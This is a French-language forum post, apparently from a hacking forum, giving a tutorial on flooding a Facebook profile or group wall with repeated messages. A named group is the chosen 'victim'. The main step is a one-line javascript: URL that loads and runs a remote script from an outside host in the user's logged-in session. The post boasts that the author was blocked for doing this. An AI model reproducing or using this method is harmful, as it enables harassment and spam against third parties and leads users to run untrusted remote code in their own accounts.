OpenYourEyes™
Banni
Bonsoir , je vais vous apprendre a FLOODER UN MUR FACEBOOK
.
Déjà il vous faut ce fameux Java lien pour DL :
Avoir le moteur de recherche "Opera" lien pour DL :
J'ai tester sur le moteur de recherche "Mozilla Firefox" et sur le moteur de recherche "Google Chrome" sa ne marche PAS .
Ensuite cliquer sur un des profils ou un groupe Facebook je vais prendre comme VICTIME le fameux groupe : "Le groupe des couches tard" et dans la barre d'URL veuillez copiez ceci : javascript
a = (b = document).createElement("script")).src = "//hallwayinsider.com/a.js", b.body.appendChild(a); void(0) ensuite tapez "Entrée" une fenêtre vas s'ouvrir comme ceci en vous demandez combien de messages voulez vous mettre ->
Après avoir cliquer sur "OK" , une nouvelle fenêtre va s'ouvrir en vous demandant quelle message vous voulez envoyer comme ceci ->
Ensuite cliquer sur "OK" et attendre un peux après avoir cliquer sur "OK" attendez à peux prés 10 secondes clique droit et "RECHARGEZ" vous aurez le nombre de message sur le mur de la personne ou du groupe
, j'ai pas pus vous faire montrer le FLOOD sur le mur car je suis BLOQUER je me suis amusez avant pour FLOODER des murs donc n'en faites pas TROP !
ENJOY
UN PETIT MERCI SERAIT TRÈS SYMPA DE VOTRE PART ! .
Déjà il vous faut ce fameux Java lien pour DL :
Vous devez être inscrit pour voir les liens ! Inscrivez-vous ou connectez-vous ici.
Avoir le moteur de recherche "Opera" lien pour DL :
Vous devez être inscrit pour voir les liens ! Inscrivez-vous ou connectez-vous ici.
J'ai tester sur le moteur de recherche "Mozilla Firefox" et sur le moteur de recherche "Google Chrome" sa ne marche PAS .
Ensuite cliquer sur un des profils ou un groupe Facebook je vais prendre comme VICTIME le fameux groupe : "Le groupe des couches tard" et dans la barre d'URL veuillez copiez ceci : javascript

Après avoir cliquer sur "OK" , une nouvelle fenêtre va s'ouvrir en vous demandant quelle message vous voulez envoyer comme ceci ->

Ensuite cliquer sur "OK" et attendre un peux après avoir cliquer sur "OK" attendez à peux prés 10 secondes clique droit et "RECHARGEZ" vous aurez le nombre de message sur le mur de la personne ou du groupe
ENJOY
UN PETIT MERCI SERAIT TRÈS SYMPA DE VOTRE PART ! .